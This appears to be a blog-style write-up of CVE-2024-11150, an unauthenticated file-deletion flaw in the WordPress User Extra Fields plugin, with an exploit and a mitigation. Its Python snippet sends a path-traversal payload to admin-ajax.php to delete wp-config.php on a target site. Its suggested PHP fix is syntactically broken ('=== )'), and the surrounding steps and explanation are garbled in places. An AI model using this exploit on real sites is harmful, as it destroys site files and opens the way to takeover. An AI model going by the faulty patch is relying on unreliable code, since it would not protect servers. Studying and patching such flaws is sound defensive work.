CVE-2024-11150 - Unauthenticated Arbitrary File Deletion in WordPress User Extra Fields Plugin: Exploit and Mitigation

The WordPress User Extra Fields plugin (versions up to and including 16.6) is affected by a severe arbitrary file deletion vulnerability (CVE-2024-11150) that can be exploited by unauthenticated attackers. This vulnerability enables attackers to execute arbitrary code on the server by deleting critical files, such as wp-config.php. In this article, we will explore the technical details of this vulnerability, demonstrate how it can be exploited, and provide recommendations for mitigation.

Vulnerability Details

The root cause of this vulnerability lies in the inadequate file path validation implemented in the delete_tmp_uploaded_file() function. This function is responsible for deleting temporary files created during the file-upload process. However, due to insufficient checks, it can be manipulated by an attacker to delete any file on the server. This effectively means that an attacker can upload a malicious file and then use this vulnerability to remove critical files, eventually leading to remote code execution.

Exploit

Below is a sample Python code snippet demonstrating how to exploit this vulnerability by sending a crafted HTTP request with a malicious file path to the plugin's vulnerable function:

import requests

target_url = 'http://target_website.com/wp-admin/admin-ajax.php';
payload = '../../../../wp-config.php'

data = {
    'action': 'wpuef_delete_tmp_uploaded_file',
    'filepath': payload
}

response = requests.post(target_url, data=data)

Replace the 'target_website.com' with the actual target website's URL running the vulnerable plugin. This code snippet will send a POST request to the vulnerable delete_tmp_uploaded_file() function with a specially crafted file path, instructing the function to delete the wp-config.php file from the server. Doing so can potentially grant the attacker remote code execution capabilities.

Original References

1. CVE-2024-11150 Vulnerability Details
2. WordPress User Extra Fields Plugin

Mitigation

The best way to mitigate this issue is to update the WordPress User Extra Fields plugin to the latest available version. The vulnerability has been fixed in the version released after 16.6.

If you are unable to update the plugin, you can follow the steps below to apply a temporary security fix until you can update the plugin:

1. Locate the plugin's main PHP file (user_extra_fields.php) within your WordPress installation directory (/wp-content/plugins/user-extra-fields/).

Find the following code in the delete_tmp_uploaded_file() function

if(isset($_POST['filepath']))
{
	unlink($_POST['filepath']);
}

3. Replace it with the following code that includes additional file path validation to prevent exploitation:

if(isset($_POST['filepath']))
{
    $validated_filepath = realpath($_POST['filepath']);
    $plugins_directory = realpath(plugin_dir_path(__FILE__));

    if(strpos($validated_filepath, $plugins_directory) === ) {
        unlink($validated_filepath);
    }
}

Save the changes and ensure the file permissions are properly set to restrict unauthorized access.

Keep in mind that this is only a temporary fix and should not be considered a long-term solution. Updating to the latest plugin version is always the recommended approach.

Conclusion

The CVE-2024-11150 vulnerability in the WordPress User Extra Fields plugin poses a severe threat to the security of the affected websites. Unauthenticated attackers can exploit this vulnerability to delete arbitrary files on the server, which may lead to remote code execution. Site administrators should update the plugin to the latest version or apply the temporary security fix mentioned above to mitigate the risk.

Timeline

Published on: 11/13/2024 05:15:12 UTC
Last modified on: 11/13/2024 17:01:16 UTC